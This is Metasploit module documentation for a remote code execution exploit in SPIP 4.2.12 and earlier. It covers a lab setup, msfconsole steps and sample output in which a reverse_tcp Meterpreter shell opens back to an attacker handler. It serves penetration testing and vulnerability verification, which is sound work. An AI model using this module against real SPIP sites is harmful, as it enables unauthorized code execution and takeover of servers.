## Vulnerable Application

This Metasploit module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input, allowing an attacker
to inject and execute arbitrary PHP code.
This can be achieved by crafting a payload that manipulates the templating data processed by the `echappe_retour()` function,
which invokes `traitements_previsu_php_modeles_eval()`, containing an `eval()` call.

To replicate a vulnerable environment for testing:

1. Install SPIP using the provided Docker Compose configuration.
2. Use the image `ipeos/spip:4.2.12` to ensure the environment is vulnerable.
3. Verify that the SPIP instance is accessible on the local network.

### Docker Setup

Use the following Docker Compose file to set up the environment:

```yaml
version: '3.8'

services:
  db:
    image: mariadb:10.5
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=MysqlRootPassword
      - MYSQL_DATABASE=spip
      - MYSQL_USER=spip
      - MYSQL_PASSWORD=spip
    volumes:
      - mysql-data:/var/lib/mysql

  app:
    image: ipeos/spip:4.2.12
    restart: always
    depends_on:
      - db
    environment:
      - SPIP_SITE_ADDRESS=http://localhost:8880
      - SPIP_DB_SERVER=db
      - SPIP_DB_LOGIN=spip
      - SPIP_DB_PASS=spip
      - SPIP_DB_NAME=spip
      - SPIP_AUTO_INSTALL=1
    ports:
      - 8880:80
    volumes:
      - spip-data:/var/www/html

volumes:
  spip-data:
  mysql-data:
```

This Docker Compose file configures a SPIP environment with a MariaDB backend, enabling automatic installation.
Here are the correct setup details:

- **SPIP Access URL:** `http://localhost:8880`
- **Database Configuration:** Utilizes MariaDB, as specified by the database service setup.
- **Automatic Installation:** Enabled via `SPIP_AUTO_INSTALL=1`.

After launching the Docker container, SPIP will be accessible at `http://localhost:8880`.
The automatic installation will simplify the initial setup, allowing you to start using SPIP without manual configuration.

If you decide to disable automatic installation by setting `SPIP_AUTO_INSTALL` to `0`, you will need to manually configure SPIP.
To do this, after starting the container, navigate to `http://localhost:8880/ecrire` to access the SPIP web installation panel.

### Non-Docker Setup

If you prefer not to use Docker, you can manually set up SPIP with the following commands:

```bash
wget https://files.spip.net/spip/archives/spip-v4.2.12.zip
unzip spip-v4.2.12.zip
cd spip-v4.2.12
php -S 0.0.0.0:8000
```

Accessible at `http://localhost:8000`.

## Verification Steps

1. Set up a SPIP instance with the specified Docker environment.
2. Launch `msfconsole` in your Metasploit framework.
3. Use the module: `use exploit/multi/http/spip_porte_plume_previsu_rce`.
4. Set `RHOSTS` to the local IP address or hostname of the target.
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
6. Execute the exploit using the `run` or `exploit` command.
7. If the target is vulnerable, the module will execute the specified payload.

## Options

No additional options are required for basic exploitation.

## Scenarios

### Successful Exploitation Against Local SPIP 4.2.12

**Setup**:

- Local SPIP instance with version 4.2.12.
- Metasploit Framework.

**Steps**:

1. Start `msfconsole`.
2. Load the module:
```
use exploit/multi/http/spip_porte_plume_previsu_rce
```
3. Set `RHOSTS` to the local IP (e.g., 127.0.0.1).
4. Configure other necessary options (TARGETURI, SSL, etc.).
5. Launch the exploit:
```
exploit
```

**Expected Results**:

With `php/meterpreter/reverse_tcp`:

```
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.12
[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
[*] Preparing to send exploit payload to the target...
[*] Sending exploit payload to the target...
[*] Sending stage (39927 bytes) to 192.168.1.36
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:56534) at 2024-08-19 19:43:18 +0200

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
Meterpreter : php/linux
```

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```
msf6 exploit(multi/http/spip_porte_plume_previsu_rce) > exploit rhosts=127.0.0.1 rport=8000

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.12
[+] The target appears to be vulnerable. The detected SPIP version (4.2.12) is vulnerable.
[*] Preparing to send exploit payload to the target...
[*] Sending exploit payload to the target...
[*] Sending stage (3045380 bytes) to 192.168.1.36
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.1.36:59106) at 2024-08-19 19:44:40 +0200

meterpreter > sysinfo 
Computer     : 192.168.1.36
OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

- The module successfully exploits the vulnerability and opens a Meterpreter session on the target.

**Note**: Ensure the SPIP instance is correctly configured and running in the Docker environment for the exploit to work as expected.
